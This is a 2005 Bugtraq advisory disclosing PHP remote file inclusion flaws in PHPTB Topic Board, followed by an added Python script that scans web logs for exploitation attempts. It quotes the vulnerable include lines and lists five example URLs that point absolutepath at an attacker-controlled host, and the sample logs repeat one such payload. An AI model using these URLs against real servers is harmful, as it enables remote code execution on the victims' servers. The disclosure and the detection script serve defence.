
List:       bugtraq
Subject:    PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities
From:       goszynskif () gmail ! com
Date:       2005-08-17 10:14:39
Message-ID: 20050817101439.3220.qmail () securityfocus ! com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: PHPTB Topic Board - Multiple PHP injection
                             vulnerabilities
   Version <= 2.0
   Homepage: http://www.phptb.com/

   Author: Filip Groszyński (VXSfx)
   Date: 17 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

     PHPTB Topic Board is an open source portal system.
     However, an input validation flaw allows malicious
     attackers to achieve remote code execution on the web server.

   --------------------------------------------------------
   
   Vulnerable code exists in ./classes/admin_o.php,
                            ./classes/board_o.php,
                            ./classes/dev_o.php,
                            ./classes/file_o.php and
                            ./classes/tech_o.php:

        <?php
        include $absolutepath.'classes/smart_o.php';
   ... EOF

   In addition, I found vulnerable code in ./classes/dev_o.php and
                                        ./classes/tech_o.php:

   ...
        require $GLOBALS['absolutepath'].'userpass.php';
   ... EOF
  
   --------------------------------------------------------

   Examples:

       http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif gmail com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
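
   Added example (not part of the original advisory): a log check a
   defender could run over web server access logs to find requests that
   set absolutepath on the five scripts listed above. The sample log
   lines, addresses and host names are constructed; the check assumes
   the application never passes absolutepath in a URL itself.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The five scripts the advisory lists as including files via $absolutepath.
AFFECTED = re.compile(r"/classes/(?:admin|board|dev|file|tech)_o\.php$", re.I)
# A value starting with a stream-wrapper scheme (http:, ftp:, php:, ...)
# or a UNC prefix; two or more scheme letters so "C:\" is not counted.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|\\\\)", re.I)
# Request line of a common/combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses and host names).
SAMPLE = [
    '192.0.2.10 - - [17/Aug/2005:10:20:01 +0000] "GET /board/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Aug/2005:10:21:44 +0000] "GET /board/classes/dev_o.php'
    '?absolutepath=http%3A%2F%2Fremote.example%2F HTTP/1.0" 200 311',
    '203.0.113.7 - - [17/Aug/2005:10:22:03 +0000] "GET /board/classes/tech_o.php'
    '?absolutepath=../../tmp/ HTTP/1.0" 200 0',
    '192.0.2.10 - - [17/Aug/2005:10:23:15 +0000] "GET /board/classes/smart_o.php'
    '?absolutepath=x HTTP/1.1" 200 0',
]


def classify(log_line):
    """Return 'remote', 'override' or None for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not AFFECTED.search(unquote(url.path)):
        return None
    verdict = None
    # parse_qsl percent-decodes once, as PHP does before filling variables.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP variable names are case-sensitive: only the exact name counts.
        if name != "absolutepath":
            continue
        if REMOTE.match(value):
            return "remote"      # include/require would fetch a remote file
        verdict = "override"     # include path redirected to a local path
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, v in enumerate(map(classify, lines), 1) if v]


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE):
        print(number, verdict)
```

   Only the query string is inspected; a value sent in a POST body or
   cookie does not appear in a standard access log.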